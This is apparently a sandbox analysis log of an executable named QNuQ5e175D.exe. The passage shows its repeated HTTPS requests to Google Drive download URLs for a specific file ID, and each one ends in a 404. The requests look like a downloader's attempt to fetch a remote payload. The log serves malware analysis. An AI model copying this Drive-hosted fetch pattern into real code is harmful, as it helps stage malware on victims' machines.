                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: script-src 'nonce-7bd134m998viTHqfmd9iKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:17 UTC  1652               IN
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RXfbnMrjNpbPxFjCphULVw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      68          192.168.2.11  50048        172.217.16.142   443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:18 UTC  424                OUT        GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:18 UTC  1920               IN         HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:18 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-6lYj5HTi4PTwqQTbkncdxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      69          192.168.2.11  50049        142.250.184.225  443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:19 UTC  466                OUT        GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:19 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTGUE6aBXiwHHRZEhZaw0NfkfKO7xp4yRxzRNdcdvEiijTYySwApKRo2-Z4uVLJ3ZpW
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:19 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-CoCzefY5EMfhb2PjZzv3hQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:19 UTC  1652               IN
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JEccZ4s1xLTSmJwXwAWh6g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      70          192.168.2.11  50050        172.217.16.142   443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:20 UTC  424                OUT        GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:20 UTC  1920               IN         HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:20 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-rGq3adOznrmi9K1Lm6VbJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      71          192.168.2.11  50051        142.250.184.225  443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:21 UTC  466                OUT        GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:21 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRFG9Q9dl6SJGxuRrgQBsa7EGMaCZon0g3OkiK6-85QRAwRnP3d35BiHa3n7Ctq2RIHnbKsPDA
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:21 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: script-src 'nonce-73FTCfE98bJZgWptiYil2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:21 UTC  1652               IN
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="73K5tFirr1bb64XRcPYGEQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                      72          192.168.2.11  50052        172.217.16.142   443               7988  C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp                Bytes transferred  Direction  Data
                                                      2025-01-11 04:07:22 UTC  424                OUT        GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:22 UTC  1920               IN         HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:22 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-fSR_FTOwv39KJrsf4lxDBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      73 | 192.168.2.11 | 50053 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:23 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:24 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgSeJj-UZZmMvhmYQ_5I1p16qTU-ZAq6xD7CsExD97nCd9ZruTxNCcstnCYpCdZM8BS8_NORw5w
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:23 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-MLY6DPlGitZriuOnXQz50w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:24 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jmvQg5bOGBXD-HrLGdh9Rw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      74 | 192.168.2.11 | 50054 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:24 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:25 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:25 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-jHYZlV4XSti_bz9AfZFChw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      75 | 192.168.2.11 | 50055 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:25 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:26 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQiwmoPlvBzeBVuNawBnksVzfkJ3VpCM-c1RDd_Q6IH86o1z6aEttiVsaniFTQnz_bL9z9NQm4
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:26 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-zaLQfp8jLvZCrcUmhnUmOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:26 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jTejR56yUNsvZfLgVybqAA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      76 | 192.168.2.11 | 50056 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:27 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
